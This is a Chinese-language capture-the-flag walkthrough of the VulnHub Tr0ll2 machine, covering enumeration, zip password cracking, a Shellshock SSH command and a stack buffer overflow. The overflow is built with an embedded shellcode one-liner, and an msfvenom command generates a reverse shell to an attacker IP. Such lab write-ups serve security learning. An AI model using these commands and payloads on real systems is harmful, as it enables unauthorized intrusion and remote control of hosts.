靶机地址:https://www.vulnhub.com/entry/tr0ll-2,107/
靶机难度:中级(CTF)
靶机描述:Tr0ll系列VM中的下一台计算机,这比原始的Tr0ll难度有所提高,但是解决所需的时间大致相同,并且毫无疑问,巨魔仍然存在!
难度是从初学者到中级。
目标:得到root权限&找到proof.txt
作者:嗯嗯呐
信息收集
nmap确定靶机地址
nmap扫描靶机端口
扫描出三个端口
21 FTP
22 ssh
80 http
访问80端口没有获得什么信息
使用dirb爆破一下目录
找到robosts,将文件中的目录加入dirb字典,在扫描一遍
再次使用dirb爆破
发现了新的可以访问的界面
访问发现全部是一个图片
之后就没有思路了,open 5.9也没有什么漏洞,
只能把获得图片全部读取一下,在dont_bother目录的图片中获得提示
y0ur_self应该是个目录,可以访问
打开发现很多base64编码
根据文件名提示应该是密码,下载先解码看看
目前靶机可以登录只有SSH和FTP
分布尝试访问一下
登陆ftp获得Tr0ll用户提示
密码也使用用户名试一下
看到ftp下有个lmao.zip文件,下载下来,打开看看
fcrackzip爆破
解压需要密码,使用fcrackzip进行暴力破解一下
Fcrackzip是一款专门破解zip类型压缩文件密码的工具,工具小巧方便、破解速度快,能使用字典和指定字符集破解,适用于linux、mac osx 系统。
-u 用zip去尝试
-D 使用字典
-p 使用字符串作为初始密码/文件
fcrackzip -u -D -p 1.txt lmao.zip
获得zip的密码,真的很快
解压zip文件,获得一个noob文件,是一个key
OpenSSH用户枚举漏洞
使用靶机存在的ssh用户枚举漏洞,查一下有没有noob用户
noob用户存在
使用key文件登陆noob用户
shellshock攻击
登陆失败,之后试了其他用户,都是不行,只能看看其他人怎么做的了,这里我登陆报错和其他人的不太一样,试了半天也不行,反正也是明白这里的思路了,就不计较了。
这里是利用Shellshock漏洞
进程误把普通环境变量() { :; }当做函数环境变量处理。
想具体了解漏洞原理,请自行百度
我们在这里构造一个shell命令试试
ssh noob@192.168.16.141 -i noob -t '() { :;}; /bin/bash'
-t 远程登录服务器后执行某个脚本
操作系统误当() { :;}; 为函数环境变量
查看环境变量,看到执行结果了
缓冲区溢出提权
漏洞提权试了半天都是失败,应该是打了补丁,查一下具有SID权限的程序,看看可不可以通过缓冲区溢出提权
find / -perm -4000 2> /dev/unll
查询具有SID权限的文件,将错误输出到/dev/unll
这三个文件夹里的内容分别执行,发现第一个是一句输出,第二个是重启,第三个是输入靶机,那我们去door3目录下的r00t文件看看去,gdb调试r00t程序
竟然有重启,以后不能乱执行程序了,我们可以先用gdb看一下main函数
使用了strcpy()函数,我们这里可以使用函数存在的漏洞
使用msf自带的插件生成1024个字符
cd /usr/share/metasploit-framework/tools/exploit/
./pattern_create.rb -l 1024
在gdb中执行r00t,获得异常的,我们可以看到缓冲区溢出在0x6a413969这个位置
使用msf中的pattern_offset.rb反查6a413969对应上面1024字符中的那个位置
对应着第268个字符
我们就冲这个字符开始,将我们想执行的命令放到这位置,就完成了缓冲区溢出的利用了
开始我们的操作
i r esp #查询esp就是栈顶指针的位置
- esp:寄存器存放当前线程的栈顶指针。
- ebp:寄存器存放当前线程的栈底指针。
- eip:寄存器存放下一个CPU指令存放的内存地址,当CPU执行完当前的指令后,从EIP寄存器中读取下一条指令的内存地址,然后继续执行。
我们也可以通着下面方式验证,溢出的内容覆盖了返回地址和esp。
因为我们前面查到268个字符之后溢出,我们生成268个字符
之后在生成的字符后添加8个字符‘CCCCDDDD’,执行以后看一下缓冲区溢出的或esp的内容
查看ESP内容
我们看到DDDD把esp覆盖,而CCCC是覆盖了返回地址。
因此我们可以的出结论,我们需要构造268个字符,将esp位置放在268个字符之后,这样esp位置就存在了返回地址的栈里,并在esp字符之后加入shellcode,这样完成了对缓冲区溢出的利用。
268字符+esp+shellcodo
./r00t $(python -c 'print "c"*268 + "\x80\xfb\xff\xbf" + "\x90"*16 + "\xb8\x5d\x7d\xc3\x23\xda\xc3\xd9\x74\x24\xf4\x5b\x33\xc9\xb1\x12\x83\xeb\xfc\x31\x43\x0e\x03\x1e\x73\x21\xd6\x91\x50\x52\xfa\x82\x25\xce\x97\x26\x23\x11\xd7\x40\xfe\x52\x8b\xd5\xb0\x6c\x61\x65\xf9\xeb\x80\x0d\x3a\xa3\x63\x4c\xd2\xb6\x83\x54\x29\x3e\x62\xd8\x4b\x10\x34\x4b\x27\x93\x3f\x8a\x8a\x14\x6d\x24\x7b\x3a\xe1\xdc\xeb\x6b\x2a\x7e\x85\xfa\xd7\x2c\x06\x74\xf6\x60\xa3\x4b\x79"')
shellcode是通过msfvenom制作的一个反弹shell
msfvenom -p linux/x86/shell/reverse_tcp LHOSTS=192.168.16.129 LPORT=6666 -b "\x00\x0a\x0" -f python
在root目录下获得flag
完成!!!
总结
缓冲区溢出的问题我纠结了好了几天总算明白一点了,感觉进度太慢了,不过收获很大,很高兴。本章主要两个大的知识点Shellshock和缓冲区溢出,上面只是一种思路,仅供参考。本章渗透思路如下图;
扫一扫
603
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
